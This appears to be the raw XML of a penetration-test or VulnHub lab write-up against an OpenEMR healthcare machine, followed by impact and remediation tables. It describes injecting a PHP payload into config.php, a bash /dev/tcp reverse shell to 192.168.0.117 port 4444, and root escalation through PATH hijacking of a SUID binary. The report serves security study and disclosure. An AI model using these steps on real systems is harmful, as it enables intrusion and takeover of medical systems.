            <w:r w:rsidRPr="00970758">
              <w:t>Lets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00970758">
              <w:t xml:space="preserve"> enumerate further we found that we can access local files </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00970758">
              <w:t>lets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00970758">
              <w:t xml:space="preserve"> try to achieve RCE by injecting PHP code </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F014CD" w14:textId="77777777" w:rsidR="003F07F9" w:rsidRDefault="00970758" w:rsidP="00A64573">
            <w:r w:rsidRPr="00970758">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B66926C" wp14:editId="2A557E54">
                  <wp:extent cx="4147922" cy="1910469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84" cy="192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281E" w14:textId="77777777" w:rsidR="00970758" w:rsidRDefault="00970758" w:rsidP="00A64573">
            <w:r>
              <w:t xml:space="preserve"> Go to administrator -&gt; then files -&gt; select </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Config.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35DCB662" w14:textId="77777777" w:rsidR="00970758" w:rsidRDefault="00970758" w:rsidP="00A64573">
            <w:r>
              <w:t xml:space="preserve">Add payload in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>config.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7B28DDCC" w14:textId="77777777" w:rsidR="00970758" w:rsidRDefault="00970758" w:rsidP="00A64573">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E320D5A" wp14:editId="6CEACA2F">
                  <wp:extent cx="4326536" cy="2130425"/>
                  <wp:effectExtent l="0" t="0" r="0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5139" cy="21445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051623" w14:textId="053995F0" w:rsidR="00970758" w:rsidRPr="00970758" w:rsidRDefault="00970758" w:rsidP="00970758">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00970758">
              <w:t>Injecting Payload on</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>config.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
            <w:r w:rsidRPr="00970758">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582F0877" w14:textId="3D5AB6E1" w:rsidR="00970758" w:rsidRPr="00970758" w:rsidRDefault="00970758" w:rsidP="00970758">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00970758">
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:t>192.168.0.117</w:t>
            </w:r>
            <w:r w:rsidRPr="00970758">
              <w:t>/openemr/interface/main/main_screen.php?auth=login&amp;site=default</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F64AF93" w14:textId="77777777" w:rsidR="00970758" w:rsidRPr="00970758" w:rsidRDefault="00970758" w:rsidP="00970758">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00970758">
              <w:t>Save it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF3284E" w14:textId="7BF4C8E4" w:rsidR="00EA6630" w:rsidRDefault="00EA6630" w:rsidP="00EA6630">
            <w:r w:rsidRPr="00EA6630">
              <w:t xml:space="preserve">STEP </w:t>
            </w:r>
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA6630">
              <w:t xml:space="preserve"> – Try to access endpoint and pass commands in variable ‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t>’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78CBC491" w14:textId="124296EC" w:rsidR="00EA6630" w:rsidRPr="00EA6630" w:rsidRDefault="00EA6630" w:rsidP="00EA6630">
            <w:r w:rsidRPr="00EA6630">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FA493DC" wp14:editId="3931FC17">
                  <wp:extent cx="4418584" cy="822369"/>
                  <wp:effectExtent l="0" t="0" r="127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095" cy="83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04BB7" w14:textId="77777777" w:rsidR="00EA6630" w:rsidRPr="00EA6630" w:rsidRDefault="00EA6630" w:rsidP="00EA6630">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA6630">
              <w:t xml:space="preserve">We got access </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t>lets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t xml:space="preserve"> get reverse shell on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t xml:space="preserve"> 4444</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CC59474" w14:textId="089183A8" w:rsidR="00EA6630" w:rsidRDefault="00EA6630" w:rsidP="00EA6630">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t>Payload :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t xml:space="preserve"> bash -c 'bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EA6630">
              <w:t>/1</w:t>
            </w:r>
            <w:r>
              <w:t>92.168.0.117</w:t>
            </w:r>
            <w:r w:rsidRPr="00EA6630">
              <w:t>/4444 0&gt;&amp;1'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="517488E4" w14:textId="1B5C8DC5" w:rsidR="00EA6630" w:rsidRPr="00EA6630" w:rsidRDefault="00EA6630" w:rsidP="00EA6630">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48B78C44" wp14:editId="313FD62F">
                  <wp:extent cx="4326255" cy="5003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128" t="80405" r="24356"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4331088" cy="50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49458E" w14:textId="77777777" w:rsidR="00970758" w:rsidRDefault="00EA6630" w:rsidP="00EA6630">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Got the shell lets try to get root access</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68189D63" w14:textId="77777777" w:rsidR="00EA6630" w:rsidRDefault="00F75534" w:rsidP="00EA6630">
            <w:r>
              <w:t xml:space="preserve">Step 9: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F75534">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F75534">
              <w:t>Privilege Escalation by SUID bit enabled for /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F75534">
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F75534">
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F75534">
              <w:t>healthcheck</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1C79B239" w14:textId="77777777" w:rsidR="00F75534" w:rsidRDefault="00F75534" w:rsidP="00F75534">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00F75534">
              <w:t>Upgrade the basic shell to a fully interactive TTY shell using a Python one-liner, then perform post-exploitation enumeration to identify potential privilege escalation paths to root.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59CDD8B3" w14:textId="77777777" w:rsidR="00F75534" w:rsidRDefault="00F75534" w:rsidP="00F75534">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04B87B99" wp14:editId="56EEE8BE">
                  <wp:extent cx="4307149" cy="797356"/>
                  <wp:effectExtent l="0" t="0" r="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40060" r="24864" b="28735"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4309272" cy="79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A08861" w14:textId="77777777" w:rsidR="00F75534" w:rsidRDefault="00F75534" w:rsidP="00F75534">
            <w:r>
              <w:t xml:space="preserve">Login as medical user </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06BEBA9E" w14:textId="77777777" w:rsidR="00F75534" w:rsidRDefault="00F75534" w:rsidP="00F75534">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="274D7082" wp14:editId="4861020B">
                  <wp:extent cx="4817043" cy="208951"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="63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32620" b="57649"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5402056" cy="234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A63955" w14:textId="77777777" w:rsidR="00D90C15" w:rsidRDefault="00D90C15" w:rsidP="00F75534"/>
          <w:p w14:paraId="654D8630" w14:textId="53939A1D" w:rsidR="00D90C15" w:rsidRPr="00D90C15" w:rsidRDefault="00D90C15" w:rsidP="00D90C15">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00D90C15">
              <w:t xml:space="preserve"> First, log in using the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D90C15">
              <w:t>medical:medical</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D90C15">
              <w:t xml:space="preserve"> credentials obtained through SQL injection, then search for SUID-enabled binaries using the find command to identify potential privilege escalation opportunities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB83A40" w14:textId="77777777" w:rsidR="00D90C15" w:rsidRDefault="00D90C15" w:rsidP="00F75534">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D24B4C9" wp14:editId="7F7E3B1F">
                  <wp:extent cx="4345228" cy="16052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37198" r="24225"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4345916" cy="1605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C95163" w14:textId="77777777" w:rsidR="00EB5603" w:rsidRPr="00EB5603" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB5603">
              <w:t>Navigated to /var/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve"> and modified the PATH environment variable to prioritize the directory used during the test.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44322B9D" w14:textId="77777777" w:rsidR="00F84B8E" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001B0941" wp14:editId="17476F31">
                  <wp:extent cx="3771900" cy="3524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26087" r="34219" b="60124"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3771900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61656C" w14:textId="77777777" w:rsidR="00EB5603" w:rsidRPr="00EB5603" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve">Created a file named </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t>offsec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve"> containing /bin/bash -p and changed its permissions to make it executable.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32EED385" w14:textId="77777777" w:rsidR="00EB5603" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2B7C49" wp14:editId="12945D53">
                  <wp:extent cx="4358244" cy="1382997"/>
                  <wp:effectExtent l="0" t="0" r="444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38826" r="23893" b="6994"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4360596" cy="1383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97457C" w14:textId="77777777" w:rsidR="00EB5603" w:rsidRPr="00EB5603" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve">Renamed or moved the created file to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t>fdisk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve"> to test whether the privileged </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t>healthcheck</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve"> program would execute it through the modified PATH.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F19CE2D" w14:textId="77777777" w:rsidR="00EB5603" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="114689EB" wp14:editId="63A1DCBF">
                  <wp:extent cx="4423362" cy="162692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20459" r="22794" b="15837"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4423558" cy="1626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EA66FD" w14:textId="77777777" w:rsidR="00EB5603" w:rsidRPr="00EB5603" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve">Executed the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t>healthcheck</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve"> program to test the identified PATH hijacking vulnerability.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="796425F3" w14:textId="77777777" w:rsidR="00EB5603" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CEA4903" wp14:editId="5C84F64F">
                  <wp:extent cx="4001984" cy="160910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t="35803" r="30153" b="1193"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4001984" cy="1609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AE1507" w14:textId="77777777" w:rsidR="00EB5603" w:rsidRPr="00EB5603" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Verified whether privilege escalation succeeded using:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB5603">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB5603">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB5603">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB5603">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="362DC1F5" w14:textId="7E393BA7" w:rsidR="00EB5603" w:rsidRDefault="00B803E3" w:rsidP="00EB5603">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74B2714C" wp14:editId="19527CAA">
                  <wp:extent cx="4637104" cy="1407226"/>
                  <wp:effectExtent l="0" t="0" r="0" b="25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-414" t="24179" b="7458"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4683996" cy="1421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0FE6CB" w14:textId="71581CF1" w:rsidR="00EB5603" w:rsidRPr="006C058B" w:rsidRDefault="00EB5603" w:rsidP="00EB5603">
            <w:r w:rsidRPr="00EB5603">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Result:</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve"> Successfully escalated privileges from the low-privileged medical user to root by exploiting an insecure PATH configuration in the target system's </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t>healthcheck</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB5603">
              <w:t xml:space="preserve"> program.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="1031C21F" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3318B90F" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Impact </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CBB5DBF" w14:textId="67F74EF8" w:rsidR="00F1152A" w:rsidRPr="00F1152A" w:rsidRDefault="00F1152A" w:rsidP="00F1152A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00F1152A">
              <w:t xml:space="preserve">Unauthorized access to the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F1152A">
              <w:t>OpenEMR</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F1152A">
              <w:t xml:space="preserve"> database.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B086944" w14:textId="00747E33" w:rsidR="00F1152A" w:rsidRPr="00F1152A" w:rsidRDefault="00F1152A" w:rsidP="00F1152A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00F1152A">
              <w:t>Exposure of sensitive patient or application information.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CBB195D" w14:textId="0AF3D765" w:rsidR="00F1152A" w:rsidRPr="00F1152A" w:rsidRDefault="00F1152A" w:rsidP="00F1152A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00F1152A">
              <w:t>Potential compromise of data confidentiality and integrity.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568039AF" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="1E0CA4A4" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FF0E70B" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:t>Remediations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="444F4622" w14:textId="78C5A886" w:rsidR="00F1152A" w:rsidRPr="00F1152A" w:rsidRDefault="00F1152A" w:rsidP="00F1152A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00F1152A">
              <w:t xml:space="preserve">Upgrade </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F1152A">
              <w:t>OpenEMR</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F1152A">
              <w:t xml:space="preserve"> to a supported, patched version.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="304269A2" w14:textId="226EF810" w:rsidR="00F1152A" w:rsidRPr="00F1152A" w:rsidRDefault="00F1152A" w:rsidP="00F1152A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00F1152A">
              <w:t>Use parameterized queries to prevent SQL injection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477BE420" w14:textId="77777777" w:rsidR="00F1152A" w:rsidRDefault="00F1152A" w:rsidP="00F1152A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00F1152A">
              <w:t>Apply least-privilege permissions to the database account.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B2D5E92" w14:textId="2F478546" w:rsidR="00F1152A" w:rsidRPr="00F1152A" w:rsidRDefault="00F1152A" w:rsidP="00F1152A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00F1152A">
              <w:t>Restrict access to the application and conduct regular security assessments</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37DC6B49" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="67C8AD9F" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6614E83D" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:t>Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CC8534E" w14:textId="77777777" w:rsidR="007F053D" w:rsidRPr="007F053D" w:rsidRDefault="007F053D" w:rsidP="007F053D">
            <w:hyperlink r:id="rId34" w:history="1">
              <w:r w:rsidRPr="007F053D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.exploit-db.com/exploits/49742</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6FEC61AA" w14:textId="2A0BDA10" w:rsidR="006C058B" w:rsidRDefault="007F053D" w:rsidP="00936BA6">
            <w:hyperlink r:id="rId35" w:history="1">
              <w:r w:rsidRPr="00252AC2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://vulnhub.com/?q=healthcare</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4B1E62FF" w14:textId="60531F80" w:rsidR="007F053D" w:rsidRPr="006C058B" w:rsidRDefault="007F053D" w:rsidP="00936BA6">
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18B99690" w14:textId="2CD9D6F4" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="00936BA6" w:rsidP="006C058B">
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D1D813" w14:textId="77777777" w:rsidR="009B64C1" w:rsidRDefault="009B64C1"/>
    <w:sectPr w:rsidR="009B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3A4FE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7EE4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E0784"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B1C2462"/>
    <w:lvl w:ilvl="0" w:tplc="B162887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F1024"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E12CF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028E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64824092"/>
